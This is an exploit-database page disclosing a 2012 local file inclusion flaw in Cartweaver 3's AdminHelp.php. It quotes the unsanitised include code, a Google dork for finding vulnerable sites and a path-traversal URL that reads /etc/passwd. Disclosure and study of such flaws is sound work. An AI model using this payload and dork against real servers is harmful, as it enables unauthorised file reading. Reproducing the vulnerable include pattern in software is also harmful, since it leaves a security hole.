header-logo
Suggest Exploit
vendor:
Cartweaver
by:
HaxOr
7,5
CVSS
HIGH
Local File Inclusion (LFI)
22
CWE
Product Name: Cartweaver
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:cartweaver:cartweaver:3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 and Windows 8
2012

Cartweaver 3 LFI exploit

Vulnerability is in the Help Documents located in /admin/helpfiles/. AdminHelp.php ~ lines 42-44, which includes a $_GET parameter that is not properly sanitized, allowing an attacker to read arbitrary files on the server.

Mitigation:

Input validation should be used to prevent the inclusion of files from external sources.
Source

Exploit-DB raw data:

# Exploit Title: Cartweaver 3 LFI exploit
# Google Dork: inurl:cw3/admin/ inurl:/admin/helpfiles/ ~ Be creative!
# Date: 13.10.2012
# Exploit Author: HaxOr
# Vendor Homepage: https://www.cartweaver.com
# Version: 3
# Tested on: Windows 7 and Windows 8

Vulnerability is in the Help Documents located in /admin/helpfiles/.
=============================
AdminHelp.php ~ lines 42-44
=============================

<?php /* Help File Body Include, populated by helpFileName variable */
$helpFileName = isset($_GET["helpFileName"]) ? $_GET["helpFileName"] : "AdminHome.php";
include("help_" . $helpFileName);?>

Few sites affected:

http://server/cw3/admin/helpfiles/AdminHelp.php?helpFileName=a/../../../../../../../../../../../../etc/passwd


Greetings to all members of Team INTRA<3